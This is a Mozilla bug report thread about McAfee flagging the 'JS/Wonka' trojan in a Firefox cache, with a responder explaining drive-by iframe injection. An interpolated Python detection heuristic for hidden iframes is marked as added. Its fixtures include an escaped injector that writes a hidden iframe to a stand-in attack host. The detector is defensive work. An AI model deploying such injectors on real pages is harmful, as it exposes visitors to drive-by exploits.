Closed Bug 549063 Opened 15 years ago Closed 13 years ago

Mcafee identifies Trojan JS/Wonka inside my Mozilla Profile

Categories

(Firefox :: General, defect)

x86
Windows XP
defect
Not set
normal

RESOLVED INVALID

People

(Reporter: bawajose, Unassigned)

Details

(Whiteboard: [sg:needinfo])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)

Mcafee identifies Trojan JS/Wonka inside my Mozilla Profile... Path below
C:\Documents and Settings\xxxxx\Local Settings\Application Data\Mozilla\Firefox\Profiles\iyh7who3.default\Cache

The first time the trojan was identified was when I was just doing some searches in google. Though the trojan was quarantined and deleted, later on I found my mcafee firewall was disabled. So I had to do a system restore.. but even after that I see a DOS window suddenly opening while using mozilla (not immediately after I open the browser) and then my firewall is gone...! This I suppose has got something wrong with Mozilla or the mozilla addons.

I had deleted the entire mozilla folder inside application data and then made a mozilla install again. I haven't seen the trojan back again till now. Please investigate to see if it is something wrong with Mozilla or its addons..

Reproducible: Always

Steps to Reproduce:
1. You need to have mcafee virus scan enterprise, mozilla and all addons that I've installed. Can't say if you get the same trojan :-)
2.
3.

Actual Results:
trojan JS/Wonka inside C:\Documents and Settings\bj141f\Local Settings\Application Data\Mozilla\Firefox\Profiles\iyh7who3.default\Cache

Expected Results:
Mozilla to be secure

none

A "javascript trojan" found in your browser cache doesn't mean you've been infected, it just means that script was on a page you visited. For any given identification you need to look it up to see if it's one that would affect your browser. In this case McAfee's link doesn't give much information

http://vil.nai.com/vil/content/v_135834.htm

Sounds like it's a pretty generic identification of a kind of obfuscated javascript whose purpose is to add an iframe that loads the actual attack. In other words not harmful in itself, but evidence of bad intent. The content of the attack frame could be anything, but most common these days are plugin exploits:
http://www.krebsonsecurity.com/2010/02/blade-hacking-away-at-drive-by-downloads/

Seeing the DOS window open is a very very bad sign. Firefox doesn't do anything like that, but some kinds of malware do. The malware is unlikely to be hiding in Firefox itself, so clearing that out and reinstalling wouldn't get rid of it. Given your firewall being shut off repeatedly I would not trust the copy of McAfee running on your machine. Instead follow the "emergency procedures" for your anti-virus which usually include booting from a special disk that contains the scanning software.

Unfortunately, unless you know what page gave you this nasty we're pretty much at a dead end.
Whiteboard: [sg:needinfo]
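
The pattern comment 1 describes (obfuscated script that writes an iframe, which then loads the real attack) can be triaged in cached content with a heuristic like the one below. This is an added example, not part of the original bug thread and not McAfee's JS/Wonka detection logic; the `%XX` escaping, the hidden-iframe criteria and every sample body and host name are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Heuristic triage only; this is not McAfee's JS/Wonka signature.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_RE = re.compile(
    r"""(?<![-\w])(?:width|height)\s*[=:]\s*["']?[01](?:px)?\b"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def decode_layers(text, max_rounds=3):
    """Undo nested %XX escaping (what unescape() reverses), with a bound."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def triage(content):
    """List hidden iframes in one cached body and where each one points."""
    findings = []
    for tag in IFRAME_RE.findall(decode_layers(content)):
        if HIDDEN_RE.search(tag):
            src = SRC_RE.search(tag)
            findings.append({
                "src": src.group(1) if src else None,
                # True when the tag exists only once the escaping is undone
                "only_after_decoding": tag not in content,
            })
    return findings

def scan(samples):
    """Map name -> findings for every body with at least one hit."""
    return {name: hits for name, body in samples.items() if (hits := triage(body))}

# Constructed sample bodies (not taken from the reporter's cache).
SAMPLES = {
    "escaped_injector.js": 'document.write(unescape("%3Ciframe%20src%3D%22'
        'http%3A%2F%2Flanding.invalid%2Fin%22%20width%3D%220%22%20'
        'height%3D%220%22%3E%3C%2Fiframe%3E"));',
    "plain_hidden.html":
        '<iframe src="http://landing.invalid/b" style="display:none"></iframe>',
    "visible_embed.html": '<iframe src="https://video.invalid/embed" '
        'width="560" height="315" style="border-width:0"></iframe>',
}

if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(name, hits)
```

A hit with `only_after_decoding` set is the case the comment calls evidence of bad intent rather than proof of infection; the recovered `src` is the lead for working out what the frame would have loaded.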
Thanks for your valuable suggestions. Yes I had to do a system restore every time I find my mcafee firewall disappears from my mcafee virus scan enterprise suite. Later I performed microsoft updates which was not happening though auto updates were turned ON. Uninstalled my mozilla, deleted all folders related to mozilla and then reinstalled it again.. yes but with a limited number of addons. I downloaded a copy of PC tools spyware doctor and ran a full scan which found nothing in my laptop.

But after all these, I haven't seen the script executing again and I very often check whether my mcafee firewall is running. Fortunately or unfortunately, my VPN client will disconnect if a firewall doesn't run. This helps me know if something is going wrong with my firewall.

Thanks for all your suggestions. Please let me know if I could do something more. I could have done a clean install of xp if this is my personal laptop, but this is official and could not do much research on it.

Thanks again

(In reply to comment #1)
> A "javascript trojan" found in your browser cache doesn't mean you've been
> infected, it just means that script was on a page you visited. For any given
> identification you need to look it up to see if it's one that would affect your
> browser. In this case McAfee's link doesn't give much information
>
> http://vil.nai.com/vil/content/v_135834.htm
>
> Sounds like it's a pretty generic identification of a kind of obfuscated
> javascript whose purpose is to add an iframe that loads the actual attack. In
> other words not harmful in itself, but evidence of bad intent. The content of
> the attack frame could be anything, but most common these days are plugin
> exploits:
> http://www.krebsonsecurity.com/2010/02/blade-hacking-away-at-drive-by-downloads/
>
> Seeing the DOS window open is a very very bad sign. Firefox doesn't do anything
> like that, but some kinds of malware do. The malware is unlikely to be hiding
> in Firefox itself, so clearing that out and reinstalling wouldn't get rid of
> it. Given your firewall being shut off repeatedly I would not trust the copy of
> McAfee running on your machine. Instead follow the "emergency procedures" for
> your anti-virus which usually include booting from a special disk that contains
> the scanning software.
>
> Unfortunately, unless you know what page gave you this nasty we're pretty much
> at a dead end.

I don't see any reason for this to remain hidden. We're certainly not going to get more info with this hidden.
Group: core-security
I do not see a bug inside of Mozilla code here. Closing as INVALID.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID